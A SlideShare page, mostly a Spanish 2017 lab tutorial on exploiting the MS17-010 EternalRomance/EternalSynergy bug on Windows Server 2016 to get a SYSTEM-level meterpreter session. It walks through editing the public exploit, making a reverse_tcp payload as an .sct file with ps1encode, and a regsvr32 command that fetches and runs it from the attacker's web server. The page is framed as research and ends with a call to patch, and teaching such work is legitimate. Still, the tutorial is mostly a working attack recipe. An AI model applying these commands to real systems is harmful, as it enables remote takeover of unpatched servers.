BootCamp Online en DevOps (and SecDevOps) de GeeksHubs Academy
BootCamp Online en DevOps (and SecDevOps) de GeeksHubs AcademyBootCamp Online en DevOps (and SecDevOps) de GeeksHubs Academy
BootCamp Online en DevOps (and SecDevOps) de GeeksHubs Academy
 
Índice del libro "Ciberseguridad de tú a tú" de 0xWord
Índice del libro "Ciberseguridad de tú a tú"  de 0xWordÍndice del libro "Ciberseguridad de tú a tú"  de 0xWord
Índice del libro "Ciberseguridad de tú a tú" de 0xWord
 
Índice del libro "Open Source INTelligence (OSINT): Investigar personas e Ide...
Índice del libro "Open Source INTelligence (OSINT): Investigar personas e Ide...Índice del libro "Open Source INTelligence (OSINT): Investigar personas e Ide...
Índice del libro "Open Source INTelligence (OSINT): Investigar personas e Ide...
 
Índice del libro "Social Hunters" de 0xWord
Índice del libro "Social Hunters" de 0xWordÍndice del libro "Social Hunters" de 0xWord
Índice del libro "Social Hunters" de 0xWord
 
Índice del libro "Kubernetes para profesionales: Desde cero al despliegue de ...
Índice del libro "Kubernetes para profesionales: Desde cero al despliegue de ...Índice del libro "Kubernetes para profesionales: Desde cero al despliegue de ...
Índice del libro "Kubernetes para profesionales: Desde cero al despliegue de ...
 
Los retos sociales y éticos del Metaverso
Los retos sociales y éticos del MetaversoLos retos sociales y éticos del Metaverso
Los retos sociales y éticos del Metaverso
 
Índice del libro "Docker: SecDevOps" 2ª Edición de 0xWord
Índice del libro "Docker: SecDevOps" 2ª Edición de 0xWordÍndice del libro "Docker: SecDevOps" 2ª Edición de 0xWord
Índice del libro "Docker: SecDevOps" 2ª Edición de 0xWord
 
Índice del libro "Malware moderno: Técnicas avanzadas y su influencia en la i...
Índice del libro "Malware moderno: Técnicas avanzadas y su influencia en la i...Índice del libro "Malware moderno: Técnicas avanzadas y su influencia en la i...
Índice del libro "Malware moderno: Técnicas avanzadas y su influencia en la i...
 
Índice del libro "Hacking Web Technologies" Silver Edition de 0xWord
Índice del libro "Hacking Web Technologies" Silver Edition de 0xWordÍndice del libro "Hacking Web Technologies" Silver Edition de 0xWord
Índice del libro "Hacking Web Technologies" Silver Edition de 0xWord
 

Último

Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxaylincamaho
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELmaryfer27m
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfSergioMendoza354770
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfsoporteupcology
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas  educativadefinicion segun autores de matemáticas  educativa
definicion segun autores de matemáticas educativaAdrianaMartnez618894
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxazmysanros90
 
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersSalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersIván López Martín
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxpabonheidy28
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadMiguelAngelVillanuev48
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxNombre Apellidos
 
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...FacuMeza2
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaarkananubis
 
KELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesKELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesFundación YOD YOD
 
Hernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxHernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxJOSEMANUELHERNANDEZH11
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafiosFundación YOD YOD
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA241531640
 
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...JaquelineJuarez15
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptMiguelAtencio10
 
Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024GiovanniJavierHidalg
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.241514949
 

Último (20)

Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFEL
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdf
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas  educativadefinicion segun autores de matemáticas  educativa
definicion segun autores de matemáticas educativa
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptx
 
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersSalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docx
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidad
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
 
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en mina
 
KELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesKELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento Protégeles
 
Hernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxHernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptx
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafios
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
 
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.ppt
 
Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.
 

Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016

  • 1. EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 1 EXPLOTAR ETERNALROMANCE/SYNERGY PARA OBTENER UNA SHELL DE METERPRETER EN WINDOWS SERVER 2016 Sheila A. Berta (@UnaPibaGeek) – Security Researcher at Eleven Paths shey.x7@gmail.com || sheila.berta@11paths.com Julio 12, 2017
  • 2. EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 2 Tabla de contenidos EXPLOTAR ETERNALROMANCE/SYNERGY PARA OBTENER UNA SHELL DE METERPRETER EN WINDOWS SERVER 2016.................................................................................................................................................1 Introducción..................................................................................................................................................3 Entorno de laboratorio..............................................................................................................................3 Obtención del exploit....................................................................................................................................5 Resolver dependencias..............................................................................................................................5 Comprobación de funcionamiento...............................................................................................................6 Datos de autenticación..............................................................................................................................6 Parámetros................................................................................................................................................6 Ejecución sin shellcode..............................................................................................................................7 Preparación de una shellcode.......................................................................................................................8 Generar archivo .SCT con PS1ENCODE......................................................................................................8 Permitir descarga de shellcode.sct............................................................................................................9 Alteración del comportamiento del exploit................................................................................................10 Ejecutar la shellcode................................................................................................................................10 Obtención de la sesión de meterpreter......................................................................................................11 Palabras finales… ........................................................................................................................................13
  • 3. EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 3 Introducción Cuando Microsoft publicó los parches para la vulnerabilidad MS17-010, quedó expuesto que el problema afectaba desde Windows 7 (Vista en realidad, pero bueno, ese no cuenta :p) hasta Windows Server 2016. Sin embargo, la serie de exploits “ETERNALS” publicados por TheShadowBrokers, presentan gran inestabilidad al intentar impactar sistemas con Windows Server 2012 en adelante, provocando la mayoría de las veces un BSOD en el equipo atacado. Con el objetivo de entender su funcionamiento y mejorarlos, los exploits de la NSA que se hicieron públicos, han pasado por la lupa de muchos investigadores. Gracias a ello, hace pocos días se publicó un exploit que aprovecha el bug de ETERNALROMANCE/SYNERGY, con mejoras en el método de explotación, para hacerlo más estable al momento de atacar sistemas con Windows Server 2012 y 2016. Pero lo cierto es que, al fiel estilo de su autor (Sleepya), si se quiere utilizar dicho exploit es necesario ingeniárselas un poco, entender cómo funciona y modificar algunas pequeñas cosas para lograr que, al momento de impactar un objetivo, ocurra lo que nosotros deseemos. Es por eso que tras haberlo analizado, aquí estoy escribiendo un nuevo “how to” :). En este paso a paso se explica todo lo necesario para hacer funcionar el exploit de Sleepya correctamente y cómo modificar su comportamiento con el fin de obtener una sesión de meterpreter sobre el equipo objetivo. Por supuesto, esta documentación es con fines de investigación. Entorno de laboratorio Para montar el entorno de laboratorio, es necesario configurar los siguientes equipos: 1. Máquina objetivo - Windows Server 2016 Una máquina con Windows Server 2016 de 64bits será utilizada como target. Luego de la instalación del sistema, no es necesario realizar cambios en el mismo, simplemente conocer su dirección IP y asegurarse de que esté encendido al realizar el ataque. 2. Máquina atacante – Preferentemente GNU/Linux Es posible utilizar cualquier sistema como máquina atacante, siempre y cuando se puedan ejecutar correctamente las siguientes herramientas:
  • 4. EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 4 • Python v2.7 - https://www.python.org/download/releases/2.7/ • Ps1Encode - https://github.com/CroweCybersecurity/ps1encode • Metasploit Framework - https://github.com/rapid7/metasploit-framework A continuación, el resumen de las configuraciones en el laboratorio: • Windows Server 2016 x64 – IP: 10.0.2.13  Target. • GNU/Linux Debian x64 – IP: 10.0.2.6  Atacante.
  • 5. EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 5 Obtención del exploit El código fue publicado en exploit-db y puede ser descargado desde siguiente enlace: https://www.exploit-db.com/exploits/42315/. Como podemos observar, está escrito en Python, por lo tanto lo guardamos con extensión .py en la máquina atacante. Una vez hecho esto, si lo ejecutamos nos encontraremos con el siguiente error: A continuación se explica cómo solventar este problema. Resolver dependencias En línea número tres del exploit se importa el módulo “mysmb”, el cual no es propio de Python ni podemos instalarlo usando pip. Este módulo fue desarrollado por Sleepya y tendremos que descargarlo desde su github en el siguiente link: https://github.com/worawit/MS17-010/blob/master/mysmb.py. Lo guardamos con el nombre de “mysmb.py” en la misma carpeta donde hemos descargado el exploit. Recordemos que en Python, para que un script pueda importar el código de un módulo, es necesario crear un archivo llamado “__INIT__.py” donde se encuentren los mismos. Al hacer esto, el script del exploit encontrará el módulo necesario y no mostrará más errores.
  • 6. EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 6 Comprobación de funcionamiento Es posible verificar el correcto funcionamiento del exploit sin hacer demasiadas modificaciones. Si lo ejecutamos tal como está, una vez que la explotación sea exitosa creará un archivo llamado “pwned.txt” en la unidad “C:” del equipo atacado. Aunque esta simple comprobación no requiere que modifiquemos nada del exploit en sí, debemos definir igualmente algunos datos y parámetros que veremos a continuación. Datos de autenticación El bug que explota ETERNALROMANCE/SYNERGY requiere que el ataque sea autenticado. Bien podría ser a través de una cuenta Guest si está habilitada, sino, tendremos que obtener el usuario y contraseña de alguna cuenta en el equipo objetivo. Es importante destacar que no importan los privilegios de la cuenta, aun si fuera “Guest”, los privilegios que obtendremos al impactar serán de SYSTEM. Para definir esta información, debemos abrir el exploit.py con cualquier editor de texto y dirigirnos a las líneas 26 y 27: Allí podremos definir el usuario y contraseña a utilizar para la autenticación. Parámetros El exploit necesita que definamos dos parámetros: la IP del objetivo y el pipe name. El protocolo SMB define que un recurso compartido puede ser de tres tipos diferentes: - File: archivo o disco, incluyendo subdirectorios. - Print: recursos para impresión. - Pipe: comunicación entre procesos siguiendo el modelo FIFO, donde se conoce como named pipes a aquellas conexiones que siguen vivas mientras el sistema siga en funcionamiento más allá de que el proceso ya no se encuentre activo. A diferencia de ETERNALBLUE, los exploits ETERNALROMANCE y ETERNALSYNERGY explotan un bug en el acceso a named pipes, es por eso que es necesario definir cuál se utilizará al momento de impactar. Personalmente suelo utilizar “spoolss”, otra opción es “browser”. También es posible utilizar el escáner de metasploit: auxiliary/scanner/smb/pipe_auditor y ver cuáles se encuentran accesibles en el sistema objetivo.
  • 7. EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 7 Ejecución sin shellcode Sin más, procedemos a ejecutar el exploit con el siguiente comando: python exploit.py <ip_objetivo> spoolss Tal como se mencionó antes, si la explotación fue exitosa veremos que se ha creado un archivo llamado “pwned.txt” en la unidad “C:” del equipo atacado. Haber logrado la explotación con éxito es un gran paso. A continuación, veremos cómo sacar mayor provecho, modificando este último comportamiento en el exploit con el objetivo de ejecutar una shell de meterpreter.
  • 8. EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 8 Preparación de una shellcode Hay muchas formas de lograr que el exploit ejecute una shell de meterpreter o cualquier otra acción en lugar de simplemente escribir aquel archivo. El primer paso es generar la shellcode que usaremos, para hacerlo utilizaré una forma que personalmente me gusta mucho y tiene numerosas ventajas a la hora de evadir controles de seguridad. En resumen, la shellcode estará en un archivo .SCT que el exploit se encargará de descargar y ejecutar en la máquina objetivo, devolviéndonos como resultado la tan ansiada sesión de meterpreter. Generar archivo .SCT con PS1ENCODE Ps1Encode es una herramienta muy útil que permite generar y codificar payloads de metasploit en diversos formatos basados en PowerShell. Podemos obtenerla desde su github: https://github.com/CroweCybersecurity/ps1encode. Para generar el payload que necesitamos, ejecutaremos la herramienta con los siguientes parámetros: ruby ps1encode.rb --PAYLOAD windows/meterpreter/reverse_tcp --LHOST=<IP_ATACANTE> -- LPORT=4444 -t sct El archivo .sct que estamos generando, tendremos que almacenarlo en un web server en la máquina atacante o en cualquier otro equipo que pueda ser accedido sin problemas por la máquina objetivo. Es por ello que, al ejecutar el comando anterior, la herramienta nos pregunta cuál será la URL completa donde alojaremos el archivo .sct. Si vamos a usar la propia máquina atacante, simplemente ingresamos: http://<IP_ATACANTE>.
  • 9. EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 9 Permitir descarga de shellcode.sct El paso anterior nos generó un archivo llamado index.sct en la carpeta de ps1encode. Para que el mismo pueda ser descargado por el exploit en la máquina objetivo, debemos moverlo a la carpeta del servidor web y asignarle los permisos adecuados. Tras realizar la ejecución de los comandos que vemos en la imagen superior, tendremos la shellcode lista para ser usada.
  • 10. EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 10 Alteración del comportamiento del exploit Si abrimos el exploit con un editor de texto y nos dirigimos a la línea 463 en adelante, nos encontraremos con lo siguiente: Allí vemos las funciones que el exploit utiliza para crear el archivo “pwned.txt” en la máquina atacada, pero más interesante aún, es la línea por debajo de ellas, donde se encuentra comentada la función service_exec(). Si observamos, aquella función ejecuta el comando “copy” como ejemplo, creando una copia de “pwned.txt”. Esto no se ejecutará a menos que quitemos el numeral (#) que precede a la función. Si lo hacemos y volvemos a ejecutar el exploit, notaremos que en la unidad “C:” tendremos dos archivos de texto: pwned.txt y pwned_exec.txt. Es claro que podemos modificar el comando copy por cualquier otro que ejecute lo que nosotros deseemos. Ejecutar la shellcode Ahora que conocemos donde modificar el exploit para cambiar su comportamiento final, editaremos la línea que invoca a la función service_exec() para que ejecute el comando que se encargará de descargar y ejecutar la shell de meterpreter: regsvr32 /s /n /u /i:http://<ip_atacante_webserver>/shellcode.sct scrobj.dll El exploit quedará de la siguiente forma:
  • 11. EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 11 Obtención de la sesión de meterpreter Finalmente, antes de realizar la ejecución del exploit.py, configuramos el exploit/multi/handler de metasploit para recibir la sesión de meterpreter. Volvemos a ejecutar el exploit guardando las modificaciones que hemos realizado en el paso anterior.
  • 12. EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 12 Tras unos pocos segundos, obtendremos la sesión de meterpreter en la máquina objetivo, con privilegios de SYSTEM.
  • 13. EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 13 Palabras finales… No hay tiempo para palabras finales, ve a parchear tus sistemas :-). Agradecimientos: Worawit Wang (@sleepya_). Por bancarme siempre: Claudio Caracciolo (@holesec). Mateo Martinez (@MateoMartinezOK). Luciano Martins (@clucianomartins). Arturo Busleiman (@buanzo). Ezequiel Sallis (@simubucks). Cristian Borghello (@crisborghe / @seguinfo). Sol O. (@0zz4n5). @DragonJar || @ekoparty || “Las Pibas de Infosec”. -- Sheila A. Berta - @UnaPibaGeek.